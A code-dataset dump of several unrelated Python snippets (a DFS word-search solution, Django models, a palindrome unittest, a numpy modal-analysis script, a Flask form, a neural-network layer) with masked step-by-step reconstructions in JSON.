m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
<|reserved_special_token_1|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not board or not board[0]: return not word
self.length = len(word)
def hasPathCore(row, col, depth=0):
if self.length == depth:
return True
hasPath = False
if 0 <= row and row < len(board) and \
0 <= col and col < len(board[0]) and \
board[row][col] == word[depth] and \
not visited[row][col]:
visited[row][col] = True
up = hasPathCore(row - 1, col, depth + 1)
down = hasPathCore(row + 1, col, depth + 1)
left = hasPathCore(row, col - 1, depth + 1)
right = hasPathCore(row, col + 1, depth + 1)
hasPath = up or down or left or right
if not hasPath:
visited[row][col] = False
return hasPath
visited = [[False] * len(board[0]) for _ in range(len(board))]
for i in range(len(board)):
for j in range(len(board[0])):
if hasPathCore(i, j, 0): return True
return False
# python, dfs解法
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
# Base case
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
# 搜索相邻的,且没有被访问过的位置
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
# 这个位置字符和word开头对上了
if board[ni][nj] == word[0]:
# 在下一层中,找到了一个成功的方向,即刻返回true
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
# 开头对上了,进入下一层寻找
if board[i][j] == word[0]:
# 剩下的依然匹配,则返回true
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
|
flexible
|
{
"blob_id": "9b8db3407313a3e39d429b7c10897fc447fcdc27",
"index": 1337,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-3": "class Solution(object):\n <mask token>\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-4": "class Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if not board or not board[0]:\n return not word\n self.length = len(word)\n\n def hasPathCore(row, col, depth=0):\n if self.length == depth:\n return True\n hasPath = False\n if 0 <= row and row < len(board) and 0 <= col and col < len(board\n [0]) and board[row][col] == word[depth] and not visited[row][\n col]:\n visited[row][col] = True\n up = hasPathCore(row - 1, col, depth + 1)\n down = hasPathCore(row + 1, col, depth + 1)\n left = hasPathCore(row, col - 1, depth + 1)\n right = hasPathCore(row, col + 1, depth + 1)\n hasPath = up or down or left or right\n if not hasPath:\n visited[row][col] = False\n return hasPath\n visited = [([False] * len(board[0])) for _ in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if hasPathCore(i, j, 0):\n return True\n return False\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-5": "class Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if not board or not board[0]: return not word\n self.length = len(word)\n def hasPathCore(row, col, depth=0):\n if self.length == depth:\n return True\n hasPath = False\n if 0 <= row and row < len(board) and \\\n 0 <= col and col < len(board[0]) and \\\n board[row][col] == word[depth] and \\\n not visited[row][col]:\n visited[row][col] = True\n up = hasPathCore(row - 1, col, depth + 1)\n down = hasPathCore(row + 1, col, depth + 1)\n left = hasPathCore(row, col - 1, depth + 1)\n right = hasPathCore(row, col + 1, depth + 1)\n hasPath = up or down or left or right\n if not hasPath:\n visited[row][col] = False\n return hasPath\n \n visited = [[False] * len(board[0]) for _ in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if hasPathCore(i, j, 0): return True\n return False\n\n# python, dfs解法\nclass Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n def dfs(i, j, word, visited=set()):\n # Base case\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n # 搜索相邻的,且没有被访问过的位置\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n # 这个位置字符和word开头对上了\n if board[ni][nj] == word[0]:\n # 在下一层中,找到了一个成功的方向,即刻返回true\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n # 开头对上了,进入下一层寻找\n if board[i][j] == word[0]:\n # 剩下的依然匹配,则返回true\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
TYPE_ENT = (
( 'ROOT' , 'ROOT' ),
( 'TIERS', 'TIERS'),
)
class EntiteClass(models.Model):
codent = models.CharField(_(u'Code Entite'),max_length=20, unique=True)
noment = models.CharField(_(u'Nom Entite'),max_length=40)
description = models.TextField(_(u'Description'))
typent = models.CharField(_(u'Type Entite'), max_length=10, choices=TYPE_ENT )
def __unicode__(self):
return "%s : %s" % (self.codent, self.noment)
class UserProfile(models.Model):
# This field is required.
user = models.OneToOneField(User)
tiers = models.ForeignKey(EntiteClass)
def __unicode__(self):
return "%s : %s" % (self.user, self.tiers)
@property
def list_name(self):
t = EntiteClass.objects.get(id=self.tiers)
u = User.objects.get(id=self.user)
l_name = "%s - %s" % (u.username, t.noment)
return "%s" % l_name
|
normal
|
{
"blob_id": "a094207b2cd9a5a4bd409ac8a644268f3808e346",
"index": 7023,
"step-1": "<mask token>\n\n\nclass UserProfile(models.Model):\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-2": "<mask token>\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-3": "<mask token>\n\n\nclass EntiteClass(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return '%s : %s' % (self.codent, self.noment)\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\nTYPE_ENT = ('ROOT', 'ROOT'), ('TIERS', 'TIERS')\n\n\nclass EntiteClass(models.Model):\n codent = models.CharField(_(u'Code Entite'), max_length=20, unique=True)\n noment = models.CharField(_(u'Nom Entite'), max_length=40)\n description = models.TextField(_(u'Description'))\n typent = models.CharField(_(u'Type Entite'), max_length=10, choices=\n TYPE_ENT)\n\n def __unicode__(self):\n return '%s : %s' % (self.codent, self.noment)\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\n\nTYPE_ENT = (\n ( 'ROOT' , 'ROOT' ),\n\t( 'TIERS', 'TIERS'),\n\t\t)\n\nclass EntiteClass(models.Model):\n\tcodent = models.CharField(_(u'Code Entite'),max_length=20, unique=True)\n\tnoment = models.CharField(_(u'Nom Entite'),max_length=40)\n\tdescription = models.TextField(_(u'Description'))\n\ttypent = models.CharField(_(u'Type Entite'), max_length=10, choices=TYPE_ENT )\n\n\tdef __unicode__(self):\n\t\treturn \"%s : %s\" % (self.codent, self.noment)\n\nclass UserProfile(models.Model):\n # This field is required.\n\tuser = models.OneToOneField(User)\n\ttiers = models.ForeignKey(EntiteClass)\n\n\tdef __unicode__(self):\n\t\treturn \"%s : %s\" % (self.user, self.tiers)\n\n\t@property\n\tdef list_name(self):\n\t\tt = EntiteClass.objects.get(id=self.tiers)\n\t\tu = User.objects.get(id=self.user)\n\t\tl_name = \"%s - %s\" % (u.username, t.noment)\n\t\treturn \"%s\" % l_name\n",
"step-ids": [
3,
4,
6,
9,
10
]
}
|
[
3,
4,
6,
9,
10
] |
from unittest import TestCase
# auto-test toggled test class to monitor changes to is_palindrome function
class Test_is_palindrome(TestCase):
def test_is_palindrome(self):
from identify_a_palindrome import is_palindrome
self.assertTrue(is_palindrome("Asdfdsa"))
self.assertTrue(is_palindrome("asDf'ssfdsa"))
def test_is_palindrome_with_non_alpha(self):
from identify_a_palindrome import is_palindrome
self.assertTrue(is_palindrome("asdf'ssfdsa"))
def test_is_not_palindrome(self):
from identify_a_palindrome import is_palindrome
self.assertFalse(is_palindrome("asdfddsa"))
self.assertFalse(is_palindrome("hello world"))
|
normal
|
{
"blob_id": "785b54dce76d6906df513a8bde0110ab6fd63357",
"index": 7083,
"step-1": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome('asdfddsa'))\n self.assertFalse(is_palindrome('hello world'))\n",
"step-4": "from unittest import TestCase\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome('asdfddsa'))\n self.assertFalse(is_palindrome('hello world'))\n",
"step-5": "from unittest import TestCase\n\n# auto-test toggled test class to monitor changes to is_palindrome function\nclass Test_is_palindrome(TestCase):\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"Asdfdsa\"))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome(\"asdfddsa\"))\n self.assertFalse(is_palindrome(\"hello world\"))\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#%%
import numpy
import time
import scipy
import os
os.chdir('/home/bbales2/modal')
import pyximport
import seaborn
pyximport.install(reload_support = True)
import polybasisqu
reload(polybasisqu)
#from rotations import symmetry
#from rotations import quaternion
#from rotations import inv_rotations
# basis polynomials are x^n * y^m * z^l where n + m + l <= N
N = 14
density = 8700.0 #4401.695921#
# Dimensions -- watch the scaling
X = .011 #0.007753#
Y = .013 #0.009057#
Z = .019 #0.013199#
c11 = 2.6
anisotropic = 2.8421
c44 = 1.35
c12 = -(c44 * 2.0 / anisotropic - c11)
# Standard deviation around each mode prediction
std = 1.0
# Rotations
w = 1.0
x = 0.0
y = 0.0
z = 0.0
# These are the sampled modes in khz
# Frequencies from SXSA
data = numpy.array([
68.066,
87.434,
104.045,
105.770,
115.270,
122.850,
131.646,
137.702,
139.280,
149.730,
156.548,
156.790,
169.746,
172.139,
173.153,
178.047,
183.433,
188.288,
197.138,
197.869,
198.128,
203.813,
206.794,
212.173,
212.613,
214.528,
215.840,
221.452,
227.569,
232.430])
#%%
c12 = -(c44 * 2.0 / anisotropic - c11)
dp, pv, ddpdX, ddpdY, ddpdZ, dpvdX, dpvdY, dpvdZ = polybasisqu.build(N, X, Y, Z)
C = numpy.array([[c11, c12, c12, 0, 0, 0],
[c12, c11, c12, 0, 0, 0],
[c12, c12, c11, 0, 0, 0],
[0, 0, 0, c44, 0, 0],
[0, 0, 0, 0, c44, 0],
[0, 0, 0, 0, 0, c44]])
w, x, y, z = 0.594755820, -0.202874980, 0.640151553, 0.441942582
#w, x, y, z = 1.0, 0.0, 0.0, 0.0
#w, x, y, z = [0.87095, 0.17028, 0.03090, 0.45989]
#w, x, y, z = [0.93894, -0.09845, -0.14279, -0.29717]
C, dCdw, dCdx, dCdy, dCdz, Kt = polybasisqu.buildRot(C, w, x, y, z)
K, M = polybasisqu.buildKM(C, dp, pv, density)
eigs2, evecs = scipy.linalg.eigh(K, M, eigvals = (6, 6 + 30 - 1))
freqs = numpy.sqrt(eigs2 * 1e11) / (numpy.pi * 2000)
print "computed, accepted"
for e1, dat in zip(freqs, data):
print "{0:0.5f} {1:0.3f}".format(e1, dat)
#freqs + 0.25 * numpy.random.randn(len(freqs))
#%%
dCdc11 = numpy.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], dtype = 'float64')
dCdc11 = Kt.dot(dCdc11).dot(Kt.T)
dCdc12 = numpy.array([[0, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], dtype = 'float64')
dCdc12 = Kt.dot(dCdc12).dot(Kt.T)
dCdc44 = numpy.array([[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1]], dtype = 'float64')
dCdc44 = Kt.dot(dCdc44).dot(Kt.T)
if True:
dKdw, _ = polybasisqu.buildKM(dCdw, dp, pv, density)
dKdx, _ = polybasisqu.buildKM(dCdx, dp, pv, density)
dKdy, _ = polybasisqu.buildKM(dCdy, dp, pv, density)
dKdz, _ = polybasisqu.buildKM(dCdz, dp, pv, density)
dKdc11, _ = polybasisqu.buildKM(dCdc11, dp, pv, density)
dKdc12, _ = polybasisqu.buildKM(dCdc12, dp, pv, density)
dKdc44, _ = polybasisqu.buildKM(dCdc44, dp, pv, density)
dldw = numpy.array([evecs[:, i].T.dot(dKdw.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldx = numpy.array([evecs[:, i].T.dot(dKdx.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldy = numpy.array([evecs[:, i].T.dot(dKdy.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldz = numpy.array([evecs[:, i].T.dot(dKdz.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc11 = numpy.array([evecs[:, i].T.dot(dKdc11.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc12 = numpy.array([evecs[:, i].T.dot(dKdc12.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc44 = numpy.array([evecs[:, i].T.dot(dKdc44.dot(evecs[:, i])) for i in range(evecs.shape[1])])
#%%
for a, b, c in zip(dldc11, dldc12, dldc44):
print a, b, c
#%%
for f1, f2, f3 in zip(freqs1, freqs2, freqs3[:30]):
print ", ".join(["{0:.2f}".format(a) for a in [f1, f2, f3]])
#%%
print "minimum (y = -0.015), y = 0.0, measured, error vs. y = -0.015, error vs. y = 0.0"
for e1, e2, dat in zip(eigs, eigs2, data):
print "{0:0.3f} {1:0.3f} {2:0.3f} {3:0.3f} {4:0.3f}".format(e1, e2, dat, numpy.abs(e1 - dat), numpy.abs(e2 - dat))
|
normal
|
{
"blob_id": "87df5481cf2dd5bb990a9b4bd5169d9293d6af79",
"index": 1144,
"step-1": "#%%\nimport numpy\nimport time\nimport scipy\nimport os\nos.chdir('/home/bbales2/modal')\nimport pyximport\nimport seaborn\npyximport.install(reload_support = True)\n\nimport polybasisqu\nreload(polybasisqu)\n\n#from rotations import symmetry\n#from rotations import quaternion\n#from rotations import inv_rotations\n\n# basis polynomials are x^n * y^m * z^l where n + m + l <= N\nN = 14\n\ndensity = 8700.0 #4401.695921#\n\n# Dimensions -- watch the scaling\nX = .011 #0.007753#\nY = .013 #0.009057#\nZ = .019 #0.013199#\n\nc11 = 2.6\nanisotropic = 2.8421\nc44 = 1.35\nc12 = -(c44 * 2.0 / anisotropic - c11)\n\n# Standard deviation around each mode prediction\nstd = 1.0\n\n# Rotations\nw = 1.0\nx = 0.0\ny = 0.0\nz = 0.0\n\n# These are the sampled modes in khz\n\n# Frequencies from SXSA\ndata = numpy.array([\n68.066,\n87.434,\n104.045,\n105.770,\n115.270,\n122.850,\n131.646,\n137.702,\n139.280,\n149.730,\n156.548,\n156.790,\n169.746,\n172.139,\n173.153,\n178.047,\n183.433,\n188.288,\n197.138,\n197.869,\n198.128,\n203.813,\n206.794,\n212.173,\n212.613,\n214.528,\n215.840,\n221.452,\n227.569,\n232.430])\n\n#%%\n\nc12 = -(c44 * 2.0 / anisotropic - c11)\n\ndp, pv, ddpdX, ddpdY, ddpdZ, dpvdX, dpvdY, dpvdZ = polybasisqu.build(N, X, Y, Z)\n\nC = numpy.array([[c11, c12, c12, 0, 0, 0],\n [c12, c11, c12, 0, 0, 0],\n [c12, c12, c11, 0, 0, 0],\n [0, 0, 0, c44, 0, 0],\n [0, 0, 0, 0, c44, 0],\n [0, 0, 0, 0, 0, c44]])\n\nw, x, y, z = 0.594755820, -0.202874980, 0.640151553, 0.441942582\n#w, x, y, z = 1.0, 0.0, 0.0, 0.0\n#w, x, y, z = [0.87095, 0.17028, 0.03090, 0.45989]\n#w, x, y, z = [0.93894, -0.09845, -0.14279, -0.29717]\n\nC, dCdw, dCdx, dCdy, dCdz, Kt = polybasisqu.buildRot(C, w, x, y, z)\nK, M = polybasisqu.buildKM(C, dp, pv, density)\neigs2, evecs = scipy.linalg.eigh(K, M, eigvals = (6, 6 + 30 - 1))\n\nfreqs = numpy.sqrt(eigs2 * 1e11) / (numpy.pi * 2000)\n\nprint \"computed, accepted\"\nfor e1, dat in zip(freqs, data):\n print \"{0:0.5f} {1:0.3f}\".format(e1, dat)\n\n#freqs + 0.25 * numpy.random.randn(len(freqs))\n#%%\ndCdc11 = numpy.array([[1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]], dtype = 'float64')\n\ndCdc11 = Kt.dot(dCdc11).dot(Kt.T)\n\ndCdc12 = numpy.array([[0, 1, 1, 0, 0, 0],\n [1, 0, 1, 0, 0, 0],\n [1, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]], dtype = 'float64')\n\ndCdc12 = Kt.dot(dCdc12).dot(Kt.T)\n\ndCdc44 = numpy.array([[0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 1]], dtype = 'float64')\n\ndCdc44 = Kt.dot(dCdc44).dot(Kt.T)\n\nif True:\n dKdw, _ = polybasisqu.buildKM(dCdw, dp, pv, density)\n dKdx, _ = polybasisqu.buildKM(dCdx, dp, pv, density)\n dKdy, _ = polybasisqu.buildKM(dCdy, dp, pv, density)\n dKdz, _ = polybasisqu.buildKM(dCdz, dp, pv, density)\n\n dKdc11, _ = polybasisqu.buildKM(dCdc11, dp, pv, density)\n dKdc12, _ = polybasisqu.buildKM(dCdc12, dp, pv, density)\n dKdc44, _ = polybasisqu.buildKM(dCdc44, dp, pv, density)\n\n dldw = numpy.array([evecs[:, i].T.dot(dKdw.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldx = numpy.array([evecs[:, i].T.dot(dKdx.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldy = numpy.array([evecs[:, i].T.dot(dKdy.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldz = numpy.array([evecs[:, i].T.dot(dKdz.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc11 = numpy.array([evecs[:, i].T.dot(dKdc11.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc12 = numpy.array([evecs[:, i].T.dot(dKdc12.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc44 = numpy.array([evecs[:, i].T.dot(dKdc44.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n#%%\nfor a, b, c in zip(dldc11, dldc12, dldc44):\n print a, b, c\n#%%\nfor f1, f2, f3 in zip(freqs1, freqs2, freqs3[:30]):\n print \", \".join([\"{0:.2f}\".format(a) for a in [f1, f2, f3]])\n#%%\n\nprint \"minimum (y = -0.015), y = 0.0, measured, error vs. y = -0.015, error vs. y = 0.0\"\nfor e1, e2, dat in zip(eigs, eigs2, data):\n print \"{0:0.3f} {1:0.3f} {2:0.3f} {3:0.3f} {4:0.3f}\".format(e1, e2, dat, numpy.abs(e1 - dat), numpy.abs(e2 - dat))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_ckeditor import CKEditorField
class BoldifyEncryptForm(FlaskForm):
boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])
submit = SubmitField('Submit')
|
normal
|
{
"blob_id": "77b43d7d9cd6b912bcee471c564b47d7a7cdd552",
"index": 6227,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoldifyEncryptForm(FlaskForm):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BoldifyEncryptForm(FlaskForm):\n boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])\n submit = SubmitField('Submit')\n",
"step-4": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired, Length\nfrom flask_ckeditor import CKEditorField\n\n\nclass BoldifyEncryptForm(FlaskForm):\n boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])\n submit = SubmitField('Submit')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
<|reserved_special_token_0|>
print(new_func(4, b=1))
print(new_func(1))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
new_func = partial(power_func, 2, a=4)
print(new_func(4, b=1))
print(new_func(1))
<|reserved_special_token_1|>
from functools import partial
def power_func(x, y, a=1, b=0):
return a * x ** y + b
new_func = partial(power_func, 2, a=4)
print(new_func(4, b=1))
print(new_func(1))
|
flexible
|
{
"blob_id": "c9f1768e2f2dd47d637c2e577067eb6cd163e972",
"index": 8331,
"step-1": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\n<mask token>\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-3": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\nnew_func = partial(power_func, 2, a=4)\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-4": "from functools import partial\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\nnew_func = partial(power_func, 2, a=4)\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
<|reserved_special_token_0|>
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
<|reserved_special_token_0|>
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
<|reserved_special_token_0|>
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim,
size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
